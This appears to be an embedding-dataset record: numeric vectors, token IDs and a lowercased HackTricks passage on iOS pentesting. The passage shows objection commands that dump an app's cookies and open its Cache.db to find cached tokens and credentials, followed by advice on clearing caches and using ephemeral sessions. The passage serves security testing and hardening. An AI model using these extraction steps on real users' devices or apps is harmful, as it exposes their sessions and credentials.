-0.15771737694740295, 0.4028046429157257, -0.6544733047485352, -0.5381122827529907, -0.04981490597128868, 0.8707453012466431, 0.3845912516117096, -0.7140069007873535, -0.46116676926612854, -0.5042827129364014, 0.01472265925258398, 0.22194303572177887, -0.36960265040397644, -0.35399821400642395, -1.0466444492340088, -0.05197831988334656, -0.2620519697666168, 0.225922092795372, 0.4973706901073456, 0.05710115283727646, -0.05885351449251175, -0.6146389245986938, -0.11744972318410873, 0.6973954439163208, 0.20637629926204681, -0.48926615715026855, -0.09755321592092514, 0.43945178389549255, 0.6073428392410278, 0.6020351648330688, 0.2451133280992508, 0.3906880021095276, -0.01748770847916603, -0.41999930143356323, 0.8063788414001465, -0.9306268692016602, -0.23411399126052856, 0.0715569406747818, 0.21395768225193024, 0.07080373167991638, 0.48874184489250183, -0.1956065446138382, 0.28640565276145935, -0.13620474934577942, 0.6442171931266785, -0.17350858449935913, 0.018508529290556908, 0.6402032971382141, -0.233479306101799, -0.40292221307754517, 0.04260554164648056, 0.8541422486305237, -0.016612065955996513, 0.5106220245361328, -0.4779653549194336, -0.5095475316047668, 0.8708497285842896, -0.922896146774292, 0.6152262091636658, 0.0945001170039177, 0.3398872911930084, 0.21042488515377045, -0.3202807903289795, 0.9030375480651855, 0.33023491501808167, 0.6893011331558228, -0.9025384783744812, -0.12710678577423096, -0.07766051590442657, 0.38838449120521545, 0.027796516194939613, 0.8352815508842468, -0.009841947816312313, -0.15413136780261993, -0.11004534363746643, 0.04645258188247681, -0.7668296694755554, -0.34689727425575256, -0.17534373700618744, -0.23548687994480133, -0.08018701523542404, -0.21666523814201355, 0.35668089985847473, -0.14542268216609955, -0.5357498526573181, 0.16908399760723114, -0.6151438355445862, 0.4492751657962799, -1.2584559917449951, -0.19788306951522827, -0.7427104711532593, 0.3867763876914978, 0.10305418819189072, 0.5329852104187012, -0.12904749810695648, 0.06807644665241241, 0.24659742414951324, -0.23797905445098877, 0.5978170037269592, -0.19729161262512207, -0.6545276641845703, 0.05975129455327988, -0.15683607757091522, 0.11039743572473526, -0.2819763123989105, 0.5672693848609924, -0.2891681492328644, 0.20542384684085846, -0.625920832157135, 0.10471166670322418, -0.6185107827186584, -0.461814820766449, 0.11269970238208771, -0.16411903500556946, 0.28677037358283997, -0.3656473159790039, -0.44408440589904785, -0.1556900143623352, 0.41048571467399597, 0.19230139255523682, -0.8232880234718323, -0.15338902175426483, -0.13180400431156158, 0.5324345827102661, -0.5669271349906921, 0.3449418246746063, -0.03463336080312729, -0.4229591190814972, -0.1644955724477768, 0.5503618121147156, -0.07671521604061127, -0.04795585945248604, -0.3430157005786896, -0.3712829351425171, 0.8956248760223389, 0.4687393605709076, -0.7521718740463257, -1.044646143913269, -0.4542633891105652, -0.30802270770072937, -0.34911632537841797, 0.3192059099674225, -0.6730719208717346, 0.5972728133201599, -0.42949455976486206, -0.5239813327789307, 0.010349219664931297, -0.3120979368686676, -0.39268597960472107, 0.008080439642071724, 0.32440826296806335, -0.4220893383026123, 0.522849977016449, -0.38141220808029175, 0.6092013120651245, 0.3761541247367859, -0.6851773262023926, -0.4607163071632385, 0.5188678503036499, -0.28434959053993225, -1.0171031951904297, 0.13611239194869995, -0.17756009101867676, 0.3050611615180969, 0.34027740359306335, -0.05976428464055061, 0.030288515612483025, -0.18307624757289886, 0.10748054832220078, 0.5378705859184265, 0.11726723611354828, 0.2465226799249649, -0.5898282527923584, 0.3410731852054596, 0.27428293228149414, 0.15703967213630676, 0.03612848371267319, -0.4552563428878784, -0.07668114453554153, -0.13274601101875305, -0.5102795958518982, -0.47175464034080505, -0.5823632478713989, 0.10319431871175766, 0.29586440324783325, -0.07933375239372253, 0.05510549992322922, -0.005415753461420536, -0.3977966606616974, -0.29413750767707825, -0.0387437604367733, -0.42338085174560547, 0.08173191547393799, 0.28331103920936584, 0.005406684707850218, -0.04765354469418526, -0.5345569252967834, 0.4786302149295807, 0.17403750121593475, -0.09664273262023926, 0.42554739117622375, -0.13867050409317017, -0.14953398704528809, 0.9051657319068909, 0.38005128502845764, -0.8859437704086304, -0.38987135887145996, -0.05909299850463867, -0.06621398776769638, 0.7619168162345886, -0.2863669693470001, 0.10515700280666351, -0.4820055663585663, -0.883517861366272, -0.1218346431851387, 0.35715484619140625, 0.3566018044948578, 0.24635164439678192, -0.4797971844673157, 0.3037746250629425, -0.19427409768104553, -0.2565659284591675, 0.47833624482154846, -0.7321287989616394, -0.3577911853790283, -1.0293256044387817, -0.21925726532936096, 0.7083075046539307, 0.24424883723258972, 1.083791732788086, -0.05449041724205017, 0.16204605996608734, 0.2517296075820923, 0.09799392521381378, 0.7272687554359436, 0.0604599304497242, -0.5029013156890869, 1.274320125579834, 0.23413920402526855, -0.7213610410690308, -0.09785696119070053, 0.2295113354921341, 0.24138665199279785, 0.11182280629873276, -0.8501214385032654, 0.2643773555755615, -0.18346327543258667, 0.1386238932609558, -0.17354464530944824, -0.6420181393623352, -0.874613344669342, -0.978695809841156, -0.632712185382843, 0.07814184576272964, -0.15641751885414124, -0.2904713749885559, 0.5360997915267944, 0.046604953706264496, -0.8039661645889282, -0.3378734290599823, -0.05927375331521034, -0.23058071732521057, 0.21241389214992523, -0.6380571126937866, 0.6517177224159241, -0.6554542779922485, -0.1779107302427292, 0.0882965624332428, 0.11910898238420486, -0.2798173725605011, -0.012196280062198639, -0.6873714923858643, -0.11080516129732132, -0.30764102935791016, 0.2676866352558136, -0.477026104927063, -0.05499367043375969, -0.3641279339790344, -0.8112587332725525, 0.3378594219684601, 0.37773391604423523, -0.5389285683631897, 0.20660966634750366, 0.25425565242767334, -0.10825818032026291, 0.18807648122310638, -0.8486575484275818, 0.1021699458360672, -0.6092709302902222, 0.07636795192956924, -0.3005547821521759, 0.6001639366149902, -0.7154799103736877, 0.28356894850730896, 0.5132530927658081, -0.5555424690246582, -0.611890435218811, -0.34246954321861267, -0.2553553283214569, 0.6572915315628052, -0.028712073341012, 0.564653754234314, 0.7886001467704773, 0.05205804109573364, 0.6104800701141357, -0.5906755328178406, 0.15202510356903076, 0.49242421984672546, -0.176991805434227, 0.911700963973999, 0.31236740946769714, -0.21229015290737152, -0.46279606223106384, 0.38267940282821655, -0.395005464553833, -0.6035099029541016, 0.5239948034286499, -0.2042684257030487, -0.170339897274971, -0.5341587066650391, -0.2805308401584625, 0.09713169187307358, 0.11878213286399841, 0.3577169179916382, 0.5059249401092529, 0.40161219239234924, -0.6415937542915344, -0.2662228047847748, -0.24100619554519653, -1.2709870338439941, -0.3621191382408142, 0.8224486112594604, -0.35020312666893005, 0.039453256875276566, -0.7895994782447815, -0.23025135695934296, -0.1442592293024063, 0.1459880918264389, -0.2288176417350769, 0.13825532793998718, 0.12840187549591064, -0.35441961884498596, 0.8543245792388916, 0.013435663655400276, -0.6384981274604797, -0.25537168979644775, 0.4368305802345276, -1.0979748964309692, -0.6771077513694763, 0.28208890557289124, 0.3289615511894226, 0.42576879262924194, -0.037363555282354355, -0.4737878143787384, 0.042254287749528885, 0.3866823613643646, 0.35273993015289307, 0.2377403974533081, -0.3964822292327881, -0.6111924648284912, 0.48774299025535583, -0.4099118113517761, 0.4289242625236511, -0.0430537573993206, -0.08196431398391724, 0.5189188122749329, 0.06899441033601761, -0.7865597009658813, 0.12396097928285599, 0.6382244825363159, -0.4359605014324188, 0.8308022022247314, 0.7534406781196594, 0.4984867572784424, -0.3746527433395386, -0.010584765113890171, -0.43968814611434937, 0.6367446780204773, 0.2618144750595093, 0.6471156477928162, -0.24033601582050323, 0.16134671866893768, 0.11295698583126068, 0.2069156914949417, -0.4974929094314575, 0.510178804397583, -0.1326938271522522, -0.3013867437839508, -0.33263400197029114, -0.14184440672397614, 0.09826765954494476, 0.4597947299480438, -0.3044891655445099, -0.46135905385017395, 0.047013863921165466, 0.4426615238189697, 0.28623053431510925, -0.21687641739845276, 0.589880108833313, -0.41817352175712585, 0.6831778287887573, -0.7002872228622437, -0.3505011796951294, -0.13105957210063934, -0.18642057478427887, -0.7344511151313782, 0.29162371158599854, 0.6008589267730713, 0.4478631317615509, 0.2582273483276367, 0.6031164526939392, -0.4600614011287689, 0.30722156167030334, -0.33641281723976135, -0.042604561895132065, -0.8938726186752319, 0.3625936210155487, -0.26511821150779724, -1.3001281023025513, -0.5438920855522156, 0.3358715772628784, -0.01920652575790882, -0.15697403252124786, 0.46645233035087585, -0.16941049695014954, 0.3492513597011566, -0.4711371064186096, -0.3115929365158081, -0.49922534823417664, -0.09092465788125992, -0.15424679219722748, -0.0989464744925499, -0.5058749318122864, 1.0325775146484375, 0.187087744474411, 0.18017180263996124, -0.19631215929985046, 0.3269897401332855, -0.1839504987001419, 0.5679143071174622, 0.29740577936172485, -0.16828706860542297, -0.21104022860527039, 0.24037180840969086, 0.052415549755096436, -0.48787134885787964, 0.21167750656604767, -0.08360535651445389, 0.5339568257331848, 0.1630227118730545, -0.3964203894138336, -0.14947497844696045, -0.0424063578248024, 0.10204273462295532, -0.40206876397132874, 0.8816215991973877, 0.010225960984826088, -0.5267757773399353, 0.2728092670440674, 0.19895118474960327, 0.11337447911500931, 0.6005862951278687, -0.4210156500339508, -0.2737858295440674, 0.08096785098314285, -0.1496991366147995, 0.2136562168598175, 1.0319032669067383, -0.07052893936634064, -0.3697960376739502, 0.26182687282562256, -0.5949047803878784, -0.903828501701355, -0.19966010749340057, -0.3159309923648834, -0.22795245051383972, 0.4847540259361267, 0.4154980182647705, 0.7730972766876221, 0.03986773267388344, -0.5551232099533081, -0.5222467184066772, 0.19670972228050232, 0.7672314047813416, -0.5014050006866455, 0.9154760241508484, 0.5497077107429504, 0.35130247473716736, -0.24241752922534943, -0.5241456031799316, 0.6380218863487244, -0.10507072508335114, -0.039689552038908005, -0.7835328578948975, -0.3364452123641968, -0.7765909433364868, 0.02604174055159092, 0.09983766824007034, 0.6644836664199829, -0.42624369263648987, 0.05093910172581673, -0.4970911741256714, -0.30460870265960693, -0.4638574421405792, 0.7167230248451233, -0.17380638420581818, 0.08723815530538559, 0.45865392684936523, -0.003403619397431612, 0.3941582441329956, -0.8807827830314636, 4.6066155433654785, 0.33594009280204773, -0.004947836045175791, 0.2783200442790985, 0.15796956419944763, 0.575865626335144, 1.0581470727920532, -0.15606021881103516, 1.0062751770019531, -0.7532729506492615, -0.13951249420642853, -0.40305259823799133, -0.07087775319814682, 0.48327070474624634, -0.02420158125460148, 0.5591363906860352, -0.2951039671897888, 0.16011153161525726, 0.06410428881645203, -0.8677253127098083, -0.7981185913085938, -0.09606950730085373, 0.18459053337574005, 0.6066601276397705, 0.45850467681884766, -0.5775232911109924, 0.4030482769012451, -0.8181304931640625, -0.25331079959869385, 0.4130188226699829, 0.14973105490207672, -0.6201002597808838, -0.10835601389408112, -0.32979512214660645, -0.7002062201499939, 0.16120821237564087, 0.5070205330848694, -0.331767201423645, -0.5646012425422668, 0.2223566770553589, 0.23336933553218842, -0.12001586705446243, -0.23526161909103394, -0.13142438232898712, 0.12646006047725677, 0.8609956502914429, -0.666739284992218, 0.57550048828125, -0.0026811545249074697, -0.6763352155685425, 0.18717090785503387, 0.05826718732714653, 0.45013192296028137, -0.26972848176956177, -0.4969514310359955, 0.3830593526363373, 0.3399406969547272, -0.657625138759613, 0.08436748385429382, 0.24131205677986145, 0.8040174841880798, -0.4051476716995239, 0.019266363233327866, 0.49503186345100403, -0.2789173126220703, 0.17683859169483185, -0.4545333683490753, 0.3454017639160156, 0.23514698445796967, 0.022916890680789948, -0.14463914930820465, -0.3799465596675873, -0.5906732678413391, -0.9606281518936157, 0.8294346332550049, -0.18479900062084198, -0.6349981427192688, 0.23335768282413483, -0.13158872723579407, -0.8811650276184082, -0.5350214838981628, -0.7858564257621765, -0.8816140294075012, 0.48246145248413086, 0.818636953830719, 0.5220255255699158, -0.4269556701183319, -0.2812687158584595, 0.373309463262558, 0.5464391112327576, 0.5165873169898987, 0.4827726483345032, 0.05654047429561615, 0.0051994938403368, 0.28762176632881165 ]
[ 17881, 4183, 2064, 2022, 21155, 2094, 2011, 4646, 9797, 2000, 3573, 1998, 26351, 2951, 2007, 1037, 16839, 4160, 2140, 6112, 1011, 4354, 7809, 1012, 1996, 2951, 2003, 8250, 2004, 1046, 3385, 1998, 2003, 25549, 1999, 2613, 1011, 2051, 2000, 2296, 4198, 7396, 1998, 2036, 3464, 2800, 2130, 2043, 1996, 4646, 3632, 2125, 4179, 1012, 2017, 2064, 2424, 2129, 2000, 4638, 2005, 28616, 8663, 8873, 27390, 2098, 2543, 15058, 17881, 2182, 1024, 2543, 15058, 7809, 22852, 2213, 17881, 22852, 2213, 7863, 1011, 1039, 1998, 8391, 9170, 4995, 1005, 1056, 8127, 2011, 6207, 1010, 2021, 2027, 2024, 2145, 4276, 9073, 1012, 2027, 3573, 2673, 16655, 12273, 2854, 13876, 2098, 1010, 4983, 1996, 9563, 2038, 21999, 9124, 1012, 2017, 2064, 2424, 2023, 17881, 1999, 1013, 2797, 1013, 13075, 1013, 4684, 1013, 16143, 1013, 2951, 1013, 4646, 1013, 1063, 10439, 3593, 1065, 18059, 1024, 1013, 2797, 1013, 13075, 1013, 4684, 1013, 16143, 1013, 2951, 1013, 4646, 1013, 1037, 2692, 2581, 2683, 20952, 2620, 2549, 1011, 5824, 2575, 2278, 1011, 26424, 5243, 1011, 17350, 2683, 2549, 1011, 3770, 2629, 2497, 2683, 2581, 2497, 21619, 2620, 2549, 2050, 1013, 5491, 7117, 1001, 1048, 16150, 12879, 23505, 1012, 8391, 12398, 1012, 8391, 1012, 5843, 12398, 1012, 8391, 1012, 2968, 1013, 12398, 1012, 8391, 1012, 3602, 1064, 1002, 2424, 1012, 1013, 1011, 2171, 1000, 1008, 1012, 8391, 1008, 1000, 2017, 2064, 2224, 1996, 6994, 8391, 2996, 2000, 2330, 2023, 7809, 6764, 1012, 1996, 2206, 2742, 16691, 2129, 2000, 2224, 21999, 2007, 1037, 8391, 7809, 1024, 1013, 1013, 2330, 1996, 4372, 26775, 22571, 3064, 8391, 5371, 2073, 2131, 14839, 1006, 1007, 2003, 1037, 4118, 2000, 6855, 1037, 3145, 2013, 1996, 3145, 24925, 2078, 2030, 1037, 8241, 7485, 9530, 8873, 2290, 1027, 8391, 1012, 9563, 1006, 21999, 14839, 1024, 2131, 14839, 1006, 1007, 1007, 2079, 1063, 2292, 8391, 1027, 3046, 8391, 1006, 9563, 1024, 9530, 8873, 2290, 1007, 1013, 1013, 2224, 1996, 8391, 2004, 3671, 1065, 4608, 2292, 7561, 2004, 24978, 2121, 29165, 1063, 1013, 1013, 2065, 1996, 21999, 3145, 2003, 3308, 1010, 1036, 7561, 1036, 2097, 2360, 2008, 2009, 1005, 1055, 2019, 19528, 7809, 10611, 2121, 29165, 1006, 1000, 7561, 3098, 8391, 1024, 1032, 1006, 7561, 1007, 1000, 1007, 1065, 6411, 15058, 5507, 2063, 17881, 3597, 10875, 15058, 5507, 2063, 2003, 1037, 12038, 1010, 11157, 1010, 6254, 1011, 8048, 1006, 16839, 4160, 2140, 1007, 7809, 3194, 2008, 2064, 2022, 26351, 2098, 1012, 2009, 4012, 22090, 2015, 3128, 2135, 2005, 16380, 1998, 6097, 2891, 1012, 4638, 2005, 2825, 6411, 15058, 17881, 1999, 1013, 2797, 1013, 13075, 1013, 4684, 1013, 16143, 1013, 2951, 1013, 4646, 1013, 1063, 10439, 3593, 1065, 1013, 3075, 1013, 4646, 2490, 1013, 16324, 10735, 3573, 1996, 16324, 1997, 1996, 18726, 1999, 1996, 3075, 1013, 16324, 1013, 16324, 1012, 12441, 3597, 23212, 2229, 2503, 2169, 18726, 19622, 1012, 2174, 1010, 9797, 2823, 5630, 2000, 3828, 2068, 1999, 1996, 3145, 24925, 2078, 2004, 1996, 3855, 17387, 5371, 2064, 2022, 11570, 1999, 10200, 2015, 1012, 2000, 22459, 1996, 16324, 5371, 2017, 2064, 2224, 2023, 18750, 5896, 2030, 2224, 22224, 1005, 1055, 16380, 16324, 2131, 1012, 2017, 2064, 2036, 2224, 22224, 2000, 10463 ]
hack_tricks
43.txt
10
these files to a json format and inspect the data.... itudehacks. dviaswiftv2. develop on ( iphone : 13. 2. 3 ) [ usb ] # ios cookies get - - json [ { " domain " : " highaltitudehacks. com ", " expiresdate " : " 2051 - 09 - 15 07 : 46 : 43 + 0000 ", " ishttponly " : " false ", " issecure " : " false ", " name " : " username ", " path " : " / ", " value " : " admin123 ", " version " : " 0 " } ] cacheby default nsurlsession stores data, such as http requests and responses in the cache. db database. this database can contain sensitive data, if tokens, usernames or any other sensitive information has been cached. to find the cached information open the data directory of the app ( / var / mobile / containers / data / application / < uuid > ) and go to / library / caches / < bundle identifier >. the webkit cache is also being stored in the cache. db file. objection can open and interact with the database with the command sqlite connect cache. db, as it is a normal sqlite database. it is recommended to disable caching this data, as it may contain sensitive information in the request or response. the following list below shows different ways of achieving this : 1. it is recommended to remove cached responses after logout. this can be done with the provided method by apple called removeallcachedresponses you can call this method as follows : urlcache. shared. removeallcachedresponses ( ) this method will remove all cached requests and responses from cache. db file. 2. if you don't need to use the advantage of cookies it would be recommended to just use the. ephemeral configuration property of urlsession, which will disable saving cookies and caches. apple documentation : an ephemeral session configuration object is similar to a default session configuration ( see default ), except that the corresponding session object doesn ’ t store caches, credential stores, or any session - related data to disk. instead, session - related data is stored in ram. the only time an ephemeral session writes data to disk is when you tell it to
[ -0.012954533100128174, 0.12863074243068695, -0.1024508997797966, 0.34968551993370056, -0.7513917684555054, 0.3889034390449524, -0.279619038105011, 0.32856908440589905, 0.9860959053039551, 0.5828291177749634, -0.1084495410323143, 0.10701778531074524, 0.32208943367004395, -0.48548343777656555, -1.022076964378357, -0.7707378268241882, -0.9134891629219055, -0.15402141213417053, -0.7206006050109863, 0.4771597385406494, 0.6058828234672546, 0.1315784901380539, -0.26877033710479736, -0.6227465867996216, -0.4641888439655304, 0.02152920514345169, 0.3216400444507599, 0.1950097382068634, 0.6799115538597107, 0.868123471736908, -0.03586501628160477, 0.05460589751601219, 0.4120066463947296, -0.7466564178466797, 0.2750419080257416, -0.11315977573394775, 0.9558386206626892, -0.2660022974014282, -0.190288245677948, -0.22442956268787384, 0.27139776945114136, -0.2925426661968231, 0.06739535182714462, -0.24899639189243317, -0.6036596298217773, -0.08138365298509598, 0.05965855345129967, -0.23967067897319794, 0.1935202181339264, -0.32099607586860657, 0.10764312744140625, 0.10083949565887451, 0.09507256001234055, 0.10867296159267426, 0.8809605836868286, 0.06546428799629211, 0.583251953125, 0.0505378283560276, -0.10911881178617477, 0.40259408950805664, -0.3680690824985504, 0.6399428844451904, 0.04859994351863861, -0.5871340036392212, 0.26443758606910706, 0.25076213479042053, -0.24525657296180725, -0.27736368775367737, -0.19622452557086945, -0.2807411551475525, -0.3673223555088043, -0.010582235641777515, -0.5803272128105164, -0.6456234455108643, -0.4201359748840332, 0.43002498149871826, -0.35407882928848267, -0.5165041089057922, -0.35480087995529175, 0.4965333938598633, -0.3492268919944763, 0.9384710788726807, -0.04355461895465851, 0.10517022758722305, -0.7476933002471924, -0.07841890305280685, 0.15330193936824799, 0.31119731068611145, -0.22955483198165894, 0.39647427201271057, 0.30421343445777893, 0.4227277934551239, -0.5237823724746704, -0.5116932988166809, 0.9797356724739075, 0.683203935623169, -0.15881019830703735, -0.018624184653162956, 0.4243738353252411, -0.6011725664138794, 0.3294393718242645, 0.8945152163505554, 0.3036523759365082, 0.04824847728013992, -0.5154215693473816, 0.26165303587913513, 0.08869785070419312, -0.2560475170612335, 0.06900456547737122, 0.32950645685195923, 0.310496062040329, -0.4109022617340088, 0.08840794116258621, -0.4410070478916168, -0.5186108350753784, 0.4303473234176636, 0.16855795681476593, -0.19811150431632996, -0.6020112633705139, 0.11518961936235428, -0.009799502789974213, -0.7081999778747559, 0.12923914194107056, -0.48202162981033325, 0.8496315479278564, 0.024552995339035988, 0.9220154285430908, 0.18989621102809906, -0.6498822569847107, -0.5289961695671082, -0.25883039832115173, 0.37640729546546936, -0.004772169981151819, 0.31330567598342896, -0.3404780328273773, -0.3938661515712738, 0.30871132016181946, 0.21323612332344055, 0.4840001165866852, -0.7286672592163086, -0.3109923005104065, -0.036126621067523956, 0.1670837551355362, 1.2823455333709717, -0.2425859421491623, -0.12069094926118851, -0.8364649415016174, -0.10420846939086914, -0.4573057293891907, 0.44597023725509644, -0.05622566491365433, -0.10807978361845016, 0.6112046241760254, -0.5705011487007141, -0.5640292167663574, -0.4796195924282074, -0.3628067970275879, 0.47829344868659973, 0.19389913976192474, 0.11002534627914429, -0.4231550991535187, 0.7473323345184326, -0.7330735921859741, 0.2418668270111084, -0.3423137664794922, 0.5886519551277161, -0.4174979329109192, -0.24942250549793243, -0.19682428240776062, -0.232512965798378, 0.22306810319423676, 0.04177422448992729, -0.09534887969493866, -0.14175200462341309, 1.0480899810791016, 0.931755542755127, -0.12875935435295105, -0.21093635261058807, 0.38409310579299927, 0.5881377458572388, -0.2933066785335541, 0.6294882297515869, 0.9220955967903137, 0.3261841833591461, -0.37467634677886963, -0.14538463950157166, -0.23874033987522125, -1.1628124713897705, -0.08312073349952698, 0.3001365661621094, -0.30455443263053894, 0.7092887163162231, -0.3251402974128723, 0.020984338596463203, 0.5981732606887817, 0.0025745327584445477, -1.0539857149124146, -0.5278670787811279, -0.28103578090667725, -1.145814061164856, -0.36228662729263306, 0.1434234231710434, -0.18466231226921082, 0.9379062652587891, -0.09324105829000473, 0.1336662471294403, 0.5278647541999817, 1.1323316097259521, -0.20209266245365143, 1.4560290575027466, 0.3576812148094177, -0.0933694913983345, -0.47083917260169983, 0.003978535998612642, -0.44692090153694153, 0.039122018963098526, -0.33100661635398865, 0.671232283115387, 0.14771132171154022, 0.22554558515548706, 0.2530581057071686, 0.7695194482803345, 0.36489930748939514, 0.2671065926551819, -0.19492919743061066, 0.39016589522361755, 0.23457768559455872, 0.1601431518793106, -0.15056727826595306, 0.039009496569633484, -0.14994913339614868, 0.7826553583145142, 0.41676634550094604, 0.7255301475524902, 0.08577561378479004, -0.14367331564426422, 0.7042593359947205, 0.36689576506614685, 0.15808066725730896, 0.24230952560901642, -0.14631202816963196, 0.4613231122493744, 0.7302679419517517, 0.30309417843818665, 0.36106693744659424, 0.5100467801094055, -0.16469882428646088, 0.2323581576347351, -0.10305804014205933, 0.8091959357261658, -0.26946866512298584, 0.626127302646637, 0.9342148303985596, 0.0038545005954802036, -1.059705138206482, -0.9468879103660583, 0.9904205203056335, 0.8023985624313354, -0.39764204621315, -1.1073747873306274, -0.08750661462545395, -0.3190104067325592, -0.2845468819141388, -0.16887688636779785, -0.0384005606174469, 0.427730530500412, 0.3100886642932892, 0.6480485200881958, -0.5399491190910339, -0.3786303997039795, -1.4091739654541016, -0.5272616147994995, -0.9660305976867676, -0.4592283070087433, -0.9890443086624146, 0.11504725366830826, 0.8279522657394409, -0.6037598252296448, 0.5924853682518005, -0.42465221881866455, -1.0275338888168335, -0.08916179835796356, 0.2177499234676361, 0.5469164252281189, 0.13637956976890564, 0.41490837931632996, -0.9418531656265259, 0.6527624726295471, -0.1160527914762497, 0.5133432745933533, -0.19504083693027496, -0.10011447221040726, -0.38458290696144104, -0.37650066614151, 0.2843179702758789, -0.5461974143981934, 0.8869139552116394, -0.20532599091529846, 0.03857821598649025, -0.19319263100624084, 0.4479845464229584, 0.017449991777539253, 0.1811245083808899, -0.39407747983932495, -0.4013119637966156, 0.6841391324996948, 0.004674952942878008, 0.20933949947357178, 0.5891329050064087, 0.2814106345176697, -0.09045351296663284, 0.5606063604354858, 0.1838851273059845, 0.6538410782814026, -0.6337295174598694, 0.2869376838207245, 0.0682859867811203, 0.32103705406188965, 0.26477864384651184, -0.38513872027397156, 0.13784486055374146, -0.03130621835589409, -0.5760617256164551, -0.07835550606250763, 0.16796404123306274, 0.7675366401672363, -0.39738228917121887, -1.2447525262832642, 0.6177945137023926, -0.7784502506256104, -0.45296281576156616, 0.04553786665201187, -0.344230055809021, 0.665138304233551, 0.44189321994781494, 0.7797589302062988, 0.20466957986354828, -0.7839592695236206, 0.049821797758340836, 1.009125828742981, 0.3820493519306183, -0.7201277613639832, 0.32651519775390625, -0.1857038140296936, -0.38223209977149963, 0.7536580562591553, 0.36549627780914307, -0.45635583996772766, -0.4046565294265747, -0.1570543348789215, -0.3655783534049988, -0.12256196141242981, 0.2471933662891388, 0.33771535754203796, 0.39591482281684875, 0.8912529945373535, -0.23957042396068573, 0.15349875390529633, 0.4411092698574066, 0.35441699624061584, 1.0938563346862793, -0.08127955347299576, 0.6189849376678467, -0.21437253057956696, -0.7469943761825562, -0.6252651810646057, 0.2614715099334717, -0.11841654777526855, 0.8677392601966858, -0.2567126154899597, 0.348010390996933, -0.1579159051179886, 0.022504903376102448, 0.694054126739502, -0.5498393177986145, -0.7122735381126404, 0.5736755728721619, -0.09696882963180542, 0.6229991912841797, -1.1217801570892334, 0.0815330520272255, -0.09374883770942688, 0.27632245421409607, 0.46537116169929504, 0.13386701047420502, 0.02836459130048752, -0.6068412661552429, -0.04365088418126106, -0.1225259006023407, -0.5129491686820984, 0.5355257391929626, 0.37903550267219543, 0.10544054210186005, -0.7747635841369629, -1.1563429832458496, -0.6233779191970825, 0.6376731991767883, 0.8607552647590637, 0.9412930011749268, 0.19723108410835266, 0.23588551580905914, 0.3055609166622162, -0.01903405785560608, 0.2286716103553772, -0.6296663880348206, -0.023831695318222046, -0.5961434841156006, 0.6418736577033997, 0.41469496488571167, -0.10165590047836304, 0.21929089725017548, 0.20479470491409302, -0.7220168709754944, -0.4407019317150116, 0.1576559841632843, -0.19571161270141602, -0.7857563495635986, -0.08479741215705872, 0.017104770988225937, -0.017509758472442627, -0.2949850261211395, -0.6811532378196716, -0.49398404359817505, 0.6266112327575684, 1.131274938583374, -0.5333982706069946, 0.13644665479660034, -0.4309898316860199, 0.38617178797721863, 0.7183364629745483, -0.010584165342152119, -0.5821112990379333, -0.6051456332206726, -0.21386194229125977, -1.0574522018432617, 0.02671256847679615, 0.3224829435348511, -0.43120649456977844, -0.495615154504776, -0.6804059147834778, -0.04285915568470955, 0.6596978902816772, -0.1840261071920395, -0.2637224793434143, -0.22175849974155426, 0.5077202916145325, -0.19247621297836304, 0.532487154006958, -0.24331459403038025, 0.41603296995162964, -0.18499453365802765, -0.6322194337844849, 0.8356109857559204, -0.8282575607299805, -0.4179145395755768, 0.24576029181480408, -0.23765450716018677, 0.13705618679523468, 0.7128854393959045, -0.5757729411125183, -0.2996586561203003, -0.14922043681144714, 0.09996171295642853, 0.10907618701457977, -0.1985677033662796, 0.8097839951515198, 0.1019025593996048, -0.6024121046066284, -0.06650983542203903, 0.24718160927295685, 0.596930742263794, 0.5901790261268616, 0.014590024948120117, -0.6246241927146912, 0.7765161991119385, -0.8162013292312622, 0.8741454482078552, 0.16426578164100647, 0.46228259801864624, 0.39234229922294617, -0.5094435811042786, 0.9447770714759827, 0.009948610328137875, 0.7858918905258179, -0.6301060318946838, -0.519984781742096, -0.011026694439351559, 0.18451915681362152, 0.04118696600198746, 0.5179604291915894, 0.19336558878421783, -0.3334312438964844, -0.37497422099113464, 0.08289358019828796, -0.7728627324104309, -0.22219759225845337, -0.8567304015159607, -0.3112005889415741, 0.6550331711769104, -0.10772109776735306, 0.39573052525520325, -0.7918116450309753, -0.9205184578895569, 0.18628808856010437, 0.19310849905014038, 0.35047075152397156, -0.6858646273612976, -0.1831253319978714, -0.49961891770362854, 0.3905024826526642, -0.14939101040363312, 0.3220486640930176, 0.11607448756694794, 0.362722784280777, 0.14061906933784485, 0.015861833468079567, 0.8396474719047546, -0.6114322543144226, -0.8222854137420654, 0.8372151851654053, -0.3719457983970642, -0.47934919595718384, 0.30128517746925354, 0.7584899663925171, 0.1549672782421112, -0.20380884408950806, 0.3625645041465759, -0.4271072447299957, -0.8952319622039795, -0.47926560044288635, 0.24216681718826294, -0.16748495399951935, 0.11740180104970932, -0.6319145560264587, -0.4433344900608063, -0.5727918744087219, 0.507765531539917, -0.2864346206188202, -0.4165882170200348, -0.15416768193244934, 0.0007801950559951365, -0.1121944934129715, -0.7499055862426758, 0.9808852672576904, -0.012649939395487309, -0.15902245044708252, 0.21827182173728943, 0.4789012372493744, -0.3636961579322815, 0.23790030181407928, -0.29392409324645996, -0.18495598435401917, 0.0037290987093001604, -0.005450276657938957, -0.8931557536125183, -0.46096935868263245, 0.25221458077430725, 0.09891290962696075, -0.6020520925521851, -0.00906760711222887, -0.98288494348526, 0.4396904408931732, 0.04418633505702019, -0.29234981536865234, 0.2097047120332718, 0.3299817740917206, 0.10341444611549377, 0.11800754070281982, 0.5576345324516296, -0.7321768403053284, 0.41706275939941406, -0.7914499044418335, 0.5226098299026489, 0.028885506093502045, -0.14005528390407562, -0.8795955777168274, 0.258494108915329, -0.7920625805854797, -0.9214725494384766, 0.3777942657470703, -0.23351982235908508, -0.20212778449058533, -0.16845270991325378, -0.5928866267204285, 0.6969650387763977, -0.5405914187431335, -0.2604842782020569, 0.7165936827659607, 0.20420610904693604, 0.25405657291412354, -0.7275447845458984, 0.2830560803413391, 0.20050129294395447, -0.10231855511665344, 0.08469600230455399, -0.46498623490333557, -0.0968611016869545, -0.4618150591850281, -0.12766890227794647, -0.5755040645599365, -0.6244781017303467, 0.23870782554149628, 0.06404408067464828, -0.24629250168800354, 0.46296361088752747, 0.10221806913614273, -0.8475865125656128, -0.5265606641769409, 0.22230197489261627, -0.11442014575004578, -0.06332986801862717, 0.17948250472545624, -0.6382738947868347, 0.0608556866645813, -0.4196248948574066, 0.38114601373672485, -0.14795918762683868, -0.2786453366279602, 0.7011677622795105, -0.05267439782619476, -0.43560656905174255, 0.893611490726471, 0.1287350207567215, -1.0018001794815063, 0.18963947892189026, -0.0014609965728595853, 